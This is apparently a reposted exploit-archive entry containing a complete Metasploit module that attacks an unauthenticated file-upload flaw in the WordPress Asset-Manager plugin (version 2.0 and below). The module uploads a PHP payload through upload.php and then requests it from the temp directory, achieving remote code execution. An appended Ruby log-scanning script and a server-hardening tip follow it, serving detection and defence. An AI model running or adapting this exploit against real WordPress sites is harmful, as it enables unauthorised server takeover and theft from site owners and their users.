WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin allows PHP file uploads: a user can upload a file to a temporary directory without authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body; the plugin expects the file in the "Filedata" field.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The uploaded file lands in the plugin's temp directory and is requested directly.
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
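The module leaves a distinctive two-request footprint in web server access logs: an unauthenticated POST to the plugin's upload.php followed by a GET of a freshly uploaded .php file under wp-content/uploads/assets/temp/. The following detection script is an added example, not part of the original post or the Metasploit module; the log lines it processes are constructed in Apache/nginx "combined" format, and the file name KqZrt.php is a made-up value standing in for the module's random five-letter name.

```ruby
# Added example: correlate the upload POST and the follow-up GET of a .php file
# in the Asset-Manager temp directory. Sample log lines below are constructed.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

UPLOAD_PATH = %r{/wp-content/plugins/asset-manager/upload\.php\z}
TEMP_PHP    = %r{/wp-content/uploads/assets/temp/(?<file>[^/?]+\.php)\z}

# Parse one combined-format access log line into a Hash, or nil if it does not match.
def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], ts: m[:ts], method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Return one alert per suspicious event. Any POST to upload.php is reported on its own,
# since the endpoint needs no authentication. A GET of a .php file in the temp directory
# that returned 200 is reported as execution, with :correlated set when the same client
# was seen uploading earlier in the log.
def detect_asset_manager_upload(lines)
  alerts = []
  uploaders = {} # ip => timestamp of the upload POST
  lines.each do |line|
    ev = parse_line(line)
    next unless ev
    if ev[:method] == 'POST' && ev[:path] =~ UPLOAD_PATH
      uploaders[ev[:ip]] = ev[:ts]
      alerts << { ip: ev[:ip], stage: :upload, ts: ev[:ts] }
    elsif ev[:method] == 'GET' && ev[:status] == 200 && (m = TEMP_PHP.match(ev[:path]))
      alerts << { ip: ev[:ip], stage: :execute, ts: ev[:ts], file: m[:file],
                  correlated: uploaders.key?(ev[:ip]) }
    end
  end
  alerts
end

# Constructed sample traffic: one benign request, then the two-step pattern from one client.
SAMPLE_LOG = [
  '203.0.113.7 - - [31/Dec/2012:09:20:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [31/Dec/2012:09:22:33 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 71 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [31/Dec/2012:09:22:34 +0800] "GET /wordpress/wp-content/uploads/assets/temp/KqZrt.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

if __FILE__ == $0
  detect_asset_manager_upload(SAMPLE_LOG).each { |a| puts a.inspect }
end
```

Independently of detection, configuring the web server to refuse to execute .php files under wp-content/uploads removes the second step entirely, since an uploaded file that is only served as static content cannot run.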